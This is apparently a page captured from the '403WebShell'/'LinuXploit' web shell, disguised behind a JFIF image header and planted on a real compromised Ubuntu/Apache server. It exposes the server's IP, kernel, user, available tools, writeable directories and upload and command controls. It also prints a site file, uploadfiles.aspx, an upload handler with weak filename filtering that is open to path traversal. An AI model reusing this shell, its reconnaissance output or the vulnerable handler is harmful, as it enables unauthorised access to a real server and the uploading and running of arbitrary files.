????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.37
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/icad.astacus.se/project/universal_old/FileProcessingScripts/ASP.NET/VBNET/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/icad.astacus.se/project/universal_old/FileProcessingScripts/ASP.NET/VBNET/uploadfiles.aspx
<%@ Page Language="VB" AutoEventWireup="true" Debug="true" %>
<%@ Import Namespace="System.IO" %>
<script runat='server'>		
		dim openTag as String = ""
		dim closeTag as String = ""
		
		'	Use this function to perform post upload actions
		'	fileName contain only name of uploaded file
		'	filePath conatin full path to uploaded file on your server		
		public Sub uploadCompleteHandler(ByVal fileName as String, ByVal filePath as String)		
			'some post upload actions here
			'Response.Write("post upload "&filePath)
		End Sub
	
		Protected Sub Page_Load(ByVal sender As Object, ByVal e As EventArgs)
		
			dim FolderToSave as String = Server.MapPath("") & "\UploadedFiles\"
			If String.IsNullOrEmpty(Request.QueryString("chunkedUpload"))  Then				
				If Request.Files.Count > 0 Then				
					dim myFile as HttpPostedFile = Request.Files(0)				
					Dim fileName As String = GetFieldValue("FileName")
					If Not String.IsNullOrEmpty(GetFieldValue("fileName")) Then
						fileName = GetFieldValue("fileName")
					End If
					If String.IsNullOrEmpty(fileName) Then
						fileName = myFile.FileName
					End If
					If not myfile is nothing andalso fileName <> "" Then
						myFile.SaveAs(FolderToSave & System.IO.Path.GetFileName(fileName))
						Response.Write("File " & fileName & " was successfully uploaded.")
						uploadCompleteHandler(fileName, FolderToSave & System.IO.Path.GetFileName(fileName))
					End If
				End If            				
				Response.Write("<br>") 'At least one symbol should be sent to response!!!		
			else
				Dim tempPath As String = FolderToSave
				
				'Used only by JavaPowUpload. determines that empty folder should be created
				Dim isEmptyFolder as Boolean = NOT string.IsNullOrEmpty(GetFieldValue("isEmptyFolder"))
				'type of upload which send request. Each uploader acts individually
				Dim uploaderType as String =  "html5"
				if NOT string.IsNullOrEmpty(GetFieldValue("uploaderType")) Then
					uploaderType = GetFieldValue("uploaderType").ToLower()
				End If
				'Size of uploaded file
				Dim fileSize as Long = 0
				if NOT string.IsNullOrEmpty(GetFieldValue("totalSize")) Then
					Long.TryParse(GetFieldValue("totalSize"), fileSize)
				End If
				if NOT string.IsNullOrEmpty(GetFieldValue("FileSize")) Then
					Long.TryParse(GetFieldValue("FileSize"), fileSize)
				End If
				'Get fileName
				Dim fileName As String = GetFieldValue("FileName")
				If Not String.IsNullOrEmpty(GetFieldValue("fileName")) Then
					fileName = GetFieldValue("fileName")
				End If
				If Not String.IsNullOrEmpty(fileName) Then
					fileName = HttpUtility.UrlDecode(fileName).Replace("..\\", "")
				End If
				
				'Determines if request sent with multiupart encoding 					
				Dim isMultiPart As Boolean  = false
				If NOT String.IsNullOrEmpty(GetFieldValue("isMultiPart")) Then					
					Boolean.TryParse(GetFieldValue("isMultiPart"), isMultiPart)
				End If
				'Determines whether uploader ask for current file size or not
				Dim querySize As Boolean = False
				If NOT String.IsNullOrEmpty(GetFieldValue("QuerySize")) Then					
					Boolean.TryParse(GetFieldValue("QuerySize"), querySize)
				End If
				if NOT string.IsNullOrEmpty(GetFieldValue("action")) Then
					querySize = GetFieldValue("action").ToLower().Equals("check")
				End If
				
				Dim complete As Boolean = false
				If NOT String.IsNullOrEmpty(GetFieldValue("Complete")) Then				
					Boolean.TryParse(GetFieldValue("Complete"), complete)
				End If
			   
				
				Dim uniqueID As String = String.Empty
				If NOT String.IsNullOrEmpty(GetFieldValue("FileId")) Then					
					uniqueID = HttpUtility.UrlDecode(GetFieldValue("FileId"))
				End If
				
				If NOT String.IsNullOrEmpty(GetFieldValue("fid")) Then					
					uniqueID = HttpUtility.UrlDecode(GetFieldValue("fid"))
				End If
			   
				If (String.IsNullOrEmpty(fileName) OrElse String.IsNullOrEmpty(tempPath)) Then
					Return
				End If
				Dim dirPath As String = GetPath(tempPath)
				Dim filePath As String = FolderToSave
				FolderToSave = GetPath(FolderToSave)
                Response.Clear()
				'For Java and Flash based uploaders we should return special xml structure in response */
				if uploaderType.Equals("java") Then				
					openTag = "<javapowupload>"
					closeTag = "</javapowupload>"				
				elseif uploaderType.Equals("flash") Then				
					openTag = "<multipowupload>"
					closeTag = "</multipowupload>"
				End If
				
				Response.Write(openTag)
			
				filePath = Path.Combine(dirPath, (uniqueID & fileName))
				Dim fi As FileInfo = New FileInfo(filePath)
				If querySize Then
					If Not Directory.Exists(dirPath) Then
						WriteError("The path for file storage not found on the server."&dirPath , uploaderType)
					ElseIf Not fi.Exists Then
						WriteOk("0", uploaderType)
					Else
						WriteOk(fi.Length.ToString, uploaderType)
                End If
                
				Else
					Dim fs As FileStream = Nothing					
					Dim ms as System.IO.MemoryStream = new System.IO.MemoryStream()
					
					Try                
						If (isMultiPart AndAlso (Request.Files.Count < 1)) Then
							WriteError("No chunk for save!", uploaderType)
							Return
						End If
						if NOT ms Is Nothing Then						
							If Not isMultiPart Then
								SaveFile(Request.InputStream, ms)
							else
								SaveFile(Request.Files(0).InputStream, ms)
							End If
						End If
						
						If File.Exists(filePath) Then
							fs = File.Open(filePath, FileMode.Append)
						Else
							fs = File.Create(filePath)
						End If
						If (Not (fs) Is Nothing) Then
							ms.Seek(0, System.IO.SeekOrigin.Begin)
							SaveFile(ms, fs)	
							fs.Close()				
						End If
						
						If NOT uploaderType.Equals("silverlight") AND NOT uploaderType.Equals("html5") Then												
							complete = (fileSize > 0 AND NOT querySize) AND (new FileInfo(filePath)).Length >= fileSize 
						End If
						
						If complete Then
							'rename or move temp file                        
							If File.Exists(Path.Combine(dirPath, fileName)) Then
								File.Delete(filePath)
							Else
								File.Move(filePath, Path.Combine(FolderToSave, fileName))
							End If
							' Place here the code making postprocessing of the uploaded file (moving to other location, database, etc). 
							Response.Write("File " & fileName & " was successfully uploaded.<br/>")
							uploadCompleteHandler(fileName, Path.Combine(FolderToSave, fileName))
						End If
						Response.Flush()
					Catch ex As Exception										
						WriteError("Error: " & ex.Message, uploaderType)
					finally				
						If (Not (fs) Is Nothing) Then
							fs.Close()
						End If
						If (Not (ms) Is Nothing) Then
							 ms.Close()
						End If				
					End Try
				End If
			End If
			Response.Write(closeTag)
			Response.Flush()
		End Sub
		
			
		Private Function GetPath(ByVal path As String) As String
			If (path.StartsWith("/") OrElse path.StartsWith("~")) Then
				Try 
					path = Server.MapPath(path)
				Catch ex As System.Exception
					
				End Try
			End If
			Return path
		End Function
		
		Private Sub SaveFile(ByVal stream As System.IO.Stream, ByVal fs As System.IO.Stream)
			Dim buffer() As Byte = New Byte((40960) - 1) {}
			Dim bytesRead As Integer
			bytesRead = stream.Read(buffer, 0, buffer.Length)
			While (bytesRead <> 0)
				fs.Write(buffer, 0, bytesRead)
				bytesRead = stream.Read(buffer, 0, buffer.Length)
			End While
		End Sub
		
		'Get value of field from query string parameters or from form
		Private Function GetFieldValue(ByVal fieldName as String) as String		
			If NOT string.IsNullOrEmpty(Request.QueryString(fieldName)) Then
				return Request.QueryString(fieldName)
			End If
			If NOT string.IsNullOrEmpty(Request.Form(fieldName)) Then
				return Request.Form(fieldName)
			End If
			return Nothing
		End Function
		
		'Write error to response stream
		Public Sub WriteError(ByVal errstr as String, ByVal uploader as String)				 
			If uploader.Equals("silverlight") OR uploader.Equals("html5") Then
				Response.Write("Error: "&errstr)
			Else			
				Response.Write("<error message='" & errstr & "'/>")
				Response.Write(closeTag)
			End If		
			Response.End()
		End Sub

		'Write OK to response stream
		Public Sub WriteOk(ByVal size as String, ByVal uploader as String)		
			If uploader.Equals("silverlight") OR uploader.Equals("html5") Then
				Response.Write(size)
			Else
				If NOT string.IsNullOrEmpty(size) Then
					Response.Write("<ok size='" & size & "'/>")
				Else 
					Response.Write("<ok/>")
				End If
			End If
		End Sub

		'Write response to response stream
		Public Sub WriteResponse(ByVal resp as String, ByVal uploader as String)		
			If uploader.Equals("silverlight") OR uploader.Equals("html5") Then
				Response.Write(resp)
			Else			
				Response.Write("<response> " & resp & "</response>")
			End If
		End Sub
		
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit